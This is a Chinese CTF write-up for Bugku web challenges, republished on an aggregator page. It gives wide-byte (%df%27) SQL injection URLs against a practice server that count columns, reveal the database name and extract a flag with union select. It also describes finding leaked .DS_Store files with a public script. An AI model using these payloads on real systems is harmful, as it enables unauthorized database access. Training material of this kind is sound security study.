bugku writeup web
来源:互联网 发布:宜兴俊知集团工资高吗 编辑:程序博客网 时间:2024/05/16 02:26
sql注入
先可以通过burp来发现是gbk编码,可以得知可能存在宽字节注入
既然有提示,那么就按照提示来
查询key表,id=1的string字段
构造payload
http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23
得到flag~~~~
有趣的是
http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database()%23
http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database() and table_name=key%23
这俩居然是爆不出来的= =
表非得是sql5.key,直接 from key是爆不出来的,所以得先爆出库名
http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23
在此之前得先知道有几列
http://103.238.227.13:10083/?id=1%df%27 order by 2%23
由此得出有两列hhh
**
sql注入2
**
这题有点迷。。。。一上来就是登陆框,尝试各种注入,无果。
参考了大牛们的博客,才晓得是源码泄露
先了解些概念:
.DS_Store文件泄漏漏洞成因:在发布代码时未删除文件夹中隐藏的.DS_store,被发现后,获取了敏感的文件名等信息。漏洞利用:http://www.example.com/.ds_store注意路径检查工具:dsstoreexppython ds_store_exp.pyhttp://www.example.com/.DS_Store
所以,直接cmd
直接打开web2目录下的flag即可,得到flag~~~
阅读全文
0 0
- BUGKU web--writeup
- bugku writeup web
- bugku几题writeup
- [Bugku]密码???[writeup]
- bugku writeup(misc_1)
- bugku ctf文件包含 writeup
- bugku杂项几题writeup
- bugku CTF练习平台writeup
- bugku misc writeup(部分)
- bugku ctf Reverse 逆向入门 writeup
- BUGKU misc--细心的大象--writeup
- bugku CTF-练习平台 部分writeup
- Writeup of love(reverse) in BugKu
- Writeup of Mountainclimbing(reverse) in BugKu
- writeup-web
- 【Bugku】这是一张单纯的图片?? 【writeup】
- (未完)Writeup of Take the maze (reverse) in BugKu
- PCTF2016 Web WriteUp
- 亚马逊的机海战术?下个月或推出智能音箱新品对抗Google Home
- 百度引领AI产业增长与转型 股价长期看好
- 三星电子一季度净利暴增46%至68亿美元,为2013年以来最佳
- 杨元庆再谈转型:PC是基石,未来所有设备基于云
- HTML的类选择器
- bugku writeup web
- 单例模式简介
- seglink代码之 generate_anchors_one layer
- TURN协议(RFC5766详解)
- 关于媒体报道“水滴平台分享课堂画面”新闻的说明
- 任正非:华为总部不会离开深圳
- 五一小长假来袭 vivo Xplay6助你玩转假期
- java并发程序设计总结七:jdk的并发容器
- 蚂蚁金服要打造智慧社区标准解决方案,这背后有什么门道?